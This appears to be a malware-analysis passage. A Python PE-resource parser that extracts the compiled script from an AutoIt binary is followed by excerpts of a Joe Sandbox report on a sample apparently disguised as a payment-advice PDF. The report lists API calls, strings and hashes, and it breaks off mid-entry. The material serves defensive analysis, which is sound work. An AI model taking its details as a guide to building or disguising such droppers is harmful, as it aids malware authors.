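# Not part of the Joe Sandbox report or AutoIt; builder and sample payload below are constructed.
import struct

RT_RCDATA = 10            # the 0x0000000A passed as lpType to FindResourceExW in the report
_HIGH_BIT = 0x80000000    # set on a directory-entry field that holds an offset to a string or subdirectory
_MASK = 0x7FFFFFFF


def _directory(rsrc, off):
    """Yield (key, offset) for each entry of the IMAGE_RESOURCE_DIRECTORY at `off`.
    key is an int ID or a str name; offset keeps its high bit when it points to a subdirectory."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    for i in range(n_named + n_id):
        name, data = struct.unpack_from("<II", rsrc, off + 16 + 8 * i)
        if name & _HIGH_BIT:                       # IMAGE_RESOURCE_DIR_STRING_U: u16 length + UTF-16LE chars
            s = name & _MASK
            (length,) = struct.unpack_from("<H", rsrc, s)
            key = rsrc[s + 2:s + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name
        yield key, data


def find_resource(rsrc, rtype, name):
    """Walk type -> name -> language as FindResourceExW(hModule, rtype, name, 0) does, taking the
    first language found. `rsrc` starts at the resource directory. Returns (data_rva, size) or None."""
    for key, off in _directory(rsrc, 0):
        if key != rtype or not off & _HIGH_BIT:
            continue
        for key2, off2 in _directory(rsrc, off & _MASK):
            # the loader matches resource names case-insensitively
            if not (isinstance(key2, str) and key2.upper() == name.upper()) or not off2 & _HIGH_BIT:
                continue
            for _lang, off3 in _directory(rsrc, off2 & _MASK):
                if not off3 & _HIGH_BIT:           # leaf: IMAGE_RESOURCE_DATA_ENTRY (OffsetToData RVA, Size)
                    return struct.unpack_from("<II", rsrc, off3)
    return None


def extract_from_section(rsrc, rsrc_rva, rtype, name):
    """Resolve the hit against a resource section whose directory is mapped at `rsrc_rva`."""
    hit = find_resource(rsrc, rtype, name)
    if hit is None:
        return None
    data_rva, size = hit
    start = data_rva - rsrc_rva
    return bytes(rsrc[start:start + size])


def extract_from_pe(pe, rtype, name):
    """Same lookup on a whole PE file read from disk (PE32 or PE32+), mapping RVAs via the section table."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    (n_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", pe, opt)
    datadir = opt + (96 if magic == 0x10B else 112)       # DataDirectory start for PE32 / PE32+
    dir_rva, _ = struct.unpack_from("<II", pe, datadir + 2 * 8)   # entry 2 = IMAGE_DIRECTORY_ENTRY_RESOURCE
    sections = [struct.unpack_from("<III", pe, opt + opt_size + 40 * i + 12)   # VA, SizeOfRawData, PointerToRawData
                for i in range(n_sections)]

    def rva_to_off(rva):
        for va, raw_size, raw_ptr in sections:
            if va <= rva < va + raw_size:
                return raw_ptr + (rva - va)
        raise ValueError("RVA %#x is not backed by any section" % rva)

    hit = find_resource(pe[rva_to_off(dir_rva):], rtype, name)
    if hit is None:
        return None
    data_rva, size = hit
    off = rva_to_off(data_rva)
    return bytes(pe[off:off + size])


def build_rsrc_section(rsrc_rva, rtype, name, payload, lang=0x409):
    """Constructed test input (not from any real binary): a minimal .rsrc holding one resource,
    laid out root -> type dir -> name dir -> data entry -> name string -> payload."""
    type_dir, name_dir, data_entry = 24, 48, 72           # each directory = 16-byte header + one 8-byte entry
    string_off = data_entry + 16
    name_u16 = name.encode("utf-16-le")
    payload_off = (string_off + 2 + len(name_u16) + 7) & ~7

    def directory(key, offset):
        named = 1 if key & _HIGH_BIT else 0
        return struct.pack("<IIHHHH", 0, 0, 0, 0, named, 1 - named) + struct.pack("<II", key, offset)

    out = bytearray()
    out += directory(rtype, _HIGH_BIT | type_dir)
    out += directory(_HIGH_BIT | string_off, _HIGH_BIT | name_dir)
    out += directory(lang, data_entry)                     # leaf entry: no high bit
    out += struct.pack("<IIII", rsrc_rva + payload_off, len(payload), 0, 0)   # IMAGE_RESOURCE_DATA_ENTRY
    out += struct.pack("<H", len(name)) + name_u16
    out += b"\0" * (payload_off - len(out)) + payload
    return bytes(out)


if __name__ == "__main__":
    sample = b"constructed stand-in for the compiled script blob"
    section = build_rsrc_section(0x2000, RT_RCDATA, "SCRIPT", sample)
    print(extract_from_section(section, 0x2000, RT_RCDATA, "script") == sample)
```

On the real sample, `extract_from_pe(open(path, "rb").read(), RT_RCDATA, "SCRIPT")` returns the bytes the stub hands to the stream, or None if no such resource exists; a hit is a cheap static confirmation of the "compiled AutoIt script" verdict, and the carved blob is what to feed a script decompiler. Decoding the blob itself is outside this example.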
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID:
                                                              • API String ID: 3964851224-0
                                                              • Opcode ID: b731b774c9be8b7874182cf4ea095de13f15f2f607b724c203aa469b4e3e1f3c
                                                              • Instruction ID: ccafb2bc71568f05e538a8de9a410765f5f5b5cee1c79b5e7f99ebce88e2f939
                                                              • Opcode Fuzzy Hash: b731b774c9be8b7874182cf4ea095de13f15f2f607b724c203aa469b4e3e1f3c
                                                              • Instruction Fuzzy Hash: E69236716087458FD720DF28C480B2ABBE1FB85314F14896DE89ADB262D775EC49CF92
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,0087E398), ref: 008A446A
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 008A447B
                                                              • FindClose.KERNEL32(00000000), ref: 008A448B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: 90739323e6049bfbaba3665d634bf982eb6bb628d341b7bc775574fc8e2850ae
                                                              • Instruction ID: cf4b48062bcb58f4743225d4e859390105db593f1de785e1b60968e42393bd67
                                                              • Opcode Fuzzy Hash: 90739323e6049bfbaba3665d634bf982eb6bb628d341b7bc775574fc8e2850ae
                                                              • Instruction Fuzzy Hash: 38E0D8324129046766106B38EC0D8E9776DFF4A335F100715F935D11D1E7F459009599
                                                              Strings
                                                              • Variable must be of type 'Object'., xrefs: 00883E62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Variable must be of type 'Object'.
                                                              • API String ID: 0-109567571
                                                              • Opcode ID: 087e881850cfccfbaad1e68d745e188b365ca6435faab8fb434e4d9daa8e5f9d
                                                              • Instruction ID: 71a42c3e90b94a67d6c9d4df8243061c543c258f23337f8499ed927255368789
                                                              • Opcode Fuzzy Hash: 087e881850cfccfbaad1e68d745e188b365ca6435faab8fb434e4d9daa8e5f9d
                                                              • Instruction Fuzzy Hash: 3CA28A75A0021DCFCB24CF58C480AAAB7B2FF58314F248469E955EB352D775ED82CB91
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00850A5B
                                                              • timeGetTime.WINMM ref: 00850D16
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00850E53
                                                              • Sleep.KERNEL32(0000000A), ref: 00850E61
                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00850EFA
                                                              • DestroyWindow.USER32 ref: 00850F06
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00850F20
                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00884E83
                                                              • TranslateMessage.USER32(?), ref: 00885C60
                                                              • DispatchMessageW.USER32(?), ref: 00885C6E
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00885C82
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                              • API String ID: 4212290369-3242690629
                                                              • Opcode ID: 457579489c8cf3c67b26b601e68bf00edda05680538d8e03e72ba4ad61da9435
                                                              • Instruction ID: 92d67bb12ba26217952265de3c6ef7fa4ff1730f4067e9c19ccb227db0d0e21a
                                                              • Opcode Fuzzy Hash: 457579489c8cf3c67b26b601e68bf00edda05680538d8e03e72ba4ad61da9435
                                                              • Instruction Fuzzy Hash: C1B2BE70608745DFD724EF28C885BAABBE5FF84304F14491DE999D72A1DB71E848CB82

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 008A8F5F: __time64.LIBCMT ref: 008A8F69
                                                                • Part of subcall function 00844EE5: _fseek.LIBCMT ref: 00844EFD
                                                              • __wsplitpath.LIBCMT ref: 008A9234
                                                                • Part of subcall function 008640FB: __wsplitpath_helper.LIBCMT ref: 0086413B
                                                              • _wcscpy.LIBCMT ref: 008A9247
                                                              • _wcscat.LIBCMT ref: 008A925A
                                                              • __wsplitpath.LIBCMT ref: 008A927F
                                                              • _wcscat.LIBCMT ref: 008A9295
                                                              • _wcscat.LIBCMT ref: 008A92A8
                                                                • Part of subcall function 008A8FA5: _memmove.LIBCMT ref: 008A8FDE
                                                                • Part of subcall function 008A8FA5: _memmove.LIBCMT ref: 008A8FED
                                                              • _wcscmp.LIBCMT ref: 008A91EF
                                                                • Part of subcall function 008A9734: _wcscmp.LIBCMT ref: 008A9824
                                                                • Part of subcall function 008A9734: _wcscmp.LIBCMT ref: 008A9837
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008A9452
                                                              • _wcsncpy.LIBCMT ref: 008A94C5
                                                              • DeleteFileW.KERNEL32(?,?), ref: 008A94FB
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008A9511
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008A9522
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008A9534
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                              • String ID:
                                                              • API String ID: 1500180987-0
                                                              • Opcode ID: 4f5d0bdc2dc58f8b46a012383bf04ade5e5790a7c1929260b3ef5f27aca5e0a1
                                                              • Instruction ID: e3fb1d46421ba3c0288d07cbfdcdebb684e2502fd2ff90052c231e47ecc8a064
                                                              • Opcode Fuzzy Hash: 4f5d0bdc2dc58f8b46a012383bf04ade5e5790a7c1929260b3ef5f27aca5e0a1
                                                              • Instruction Fuzzy Hash: AFC10BB1D0421DAADF21DF99CC85ADEB7BDFF45310F0040AAF609E6151EB309A458F66

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00843074
                                                              • RegisterClassExW.USER32(00000030), ref: 0084309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008430AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 008430CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008430DC
                                                              • LoadIconW.USER32(000000A9), ref: 008430F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00843101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 0c2cc4dcba8b7802780c4fc317e12ec23efa40f2dd26540272fbe507b8b8b666
                                                              • Instruction ID: 50acb39e7096fa68ca9c41e9848ddf6e73e85317ebee7bc727087b90de129cc6
                                                              • Opcode Fuzzy Hash: 0c2cc4dcba8b7802780c4fc317e12ec23efa40f2dd26540272fbe507b8b8b666
                                                              • Instruction Fuzzy Hash: F93129B1814358EFEB41CFA4E889ADABBF5FB09710F10812AFA50E62A1D7B54544CF90

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00843074
                                                              • RegisterClassExW.USER32(00000030), ref: 0084309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008430AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 008430CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008430DC
                                                              • LoadIconW.USER32(000000A9), ref: 008430F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00843101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 53354d438c057cc14af11b545c2d3dc9d18a230cc5658828d3afdb965bd97269
                                                              • Instruction ID: be11aa0b7ea8f13ae9594894204a22fbd3f8b16b24dabaea91839bbbf3f5b556
                                                              • Opcode Fuzzy Hash: 53354d438c057cc14af11b545c2d3dc9d18a230cc5658828d3afdb965bd97269
                                                              • Instruction Fuzzy Hash: 6E21C0B1915618AFEB00DFA4E889B9EBBF5FB08700F00812AFA11E62A1D7B14544DF95

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00844706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009052F8,?,008437AE,?), ref: 00844724
                                                                • Part of subcall function 0086050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00847165), ref: 0086052D
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008471A8
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0087E8C8
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0087E909
                                                              • RegCloseKey.ADVAPI32(?), ref: 0087E947
                                                              • _wcscat.LIBCMT ref: 0087E9A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                              • API String ID: 2673923337-2727554177
                                                              • Opcode ID: ab5bc05de4c726d45a5088a3e6f8d2e0749e04cddab19713246761ee7ce40c66
                                                              • Instruction ID: a0fd4384d1f671190a7fdddad466bb4a3ace13f074b52bff6cec54d9b7601629
                                                              • Opcode Fuzzy Hash: ab5bc05de4c726d45a5088a3e6f8d2e0749e04cddab19713246761ee7ce40c66
                                                              • Instruction Fuzzy Hash: 24719D715183059EC304EF2DE8819ABBBF8FF99310B40492EF555C72A1EB71D948DB52

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00843A50
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00843A5F
                                                              • LoadIconW.USER32(00000063), ref: 00843A76
                                                              • LoadIconW.USER32(000000A4), ref: 00843A88
                                                              • LoadIconW.USER32(000000A2), ref: 00843A9A
                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00843AC0
                                                              • RegisterClassExW.USER32(?), ref: 00843B16
                                                                • Part of subcall function 00843041: GetSysColorBrush.USER32(0000000F), ref: 00843074
                                                                • Part of subcall function 00843041: RegisterClassExW.USER32(00000030), ref: 0084309E
                                                                • Part of subcall function 00843041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008430AF
                                                                • Part of subcall function 00843041: InitCommonControlsEx.COMCTL32(?), ref: 008430CC
                                                                • Part of subcall function 00843041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008430DC
                                                                • Part of subcall function 00843041: LoadIconW.USER32(000000A9), ref: 008430F2
                                                                • Part of subcall function 00843041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00843101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: c419c8fe293a0121d0631470bf57f474fce6b1ae879bf4c892448b5c4776a8ce
                                                              • Instruction ID: 6a429901c59cf35e209f14503a1e782b3416481d80298f3d3ed4c0e6260052a1
                                                              • Opcode Fuzzy Hash: c419c8fe293a0121d0631470bf57f474fce6b1ae879bf4c892448b5c4776a8ce
                                                              • Instruction Fuzzy Hash: F4214870D24708EFEB10DFA8EC09B9E7FB1FB08711F01412AE614A62B2D3B55654AF94

                                                              Control-flow Graph

                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 008436D2
                                                              • KillTimer.USER32(?,00000001), ref: 008436FC
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0084371F
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0084372A
                                                              • CreatePopupMenu.USER32 ref: 0084373E
                                                              • PostQuitMessage.USER32(00000000), ref: 0084374D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: 108fb2e0a922fb8cea0d3460bfcca005d204028bf363dc9e2a856316dee978e4
                                                              • Instruction ID: ffd55db4c5c0e06c88a06269f5c42b194945758a7bfc6e039da404ce7331236c
                                                              • Opcode Fuzzy Hash: 108fb2e0a922fb8cea0d3460bfcca005d204028bf363dc9e2a856316dee978e4
                                                              • Instruction Fuzzy Hash: 4F4127B221460EBFDF245F68DC0DB7A36A5FF10300F154135FA12D62E6DB709E54AA62

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                              • API String ID: 1825951767-3513169116
                                                              • Opcode ID: cd52b2133ad5c28fe8ad2e1d6b4e486f56e69ecd52d2e73e261e08fb5d3d0785
                                                              • Instruction ID: 07da9b3150e4c123d43b1b8fa81d27c10823ff4a1c04d4d2f127f42b9fe20519
                                                              • Opcode Fuzzy Hash: cd52b2133ad5c28fe8ad2e1d6b4e486f56e69ecd52d2e73e261e08fb5d3d0785
                                                              • Instruction Fuzzy Hash: 14A13B7191062D9ADF14EBA8DC95EEEBB79FF14310F400429E416E7192EF749A08CB62

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01655631
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01655857
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                              • Instruction ID: 7bd805eaa2988b40a040329e68891ca2960597837a011c309c0cd801f92d2298
                                                              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                              • Instruction Fuzzy Hash: F8A12A74E00219EBDB54CFA4C898BEEBBB5FF48304F208159E902BB280D7759A41CF65

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00843A03
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00843A24
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00843A38
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00843A41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
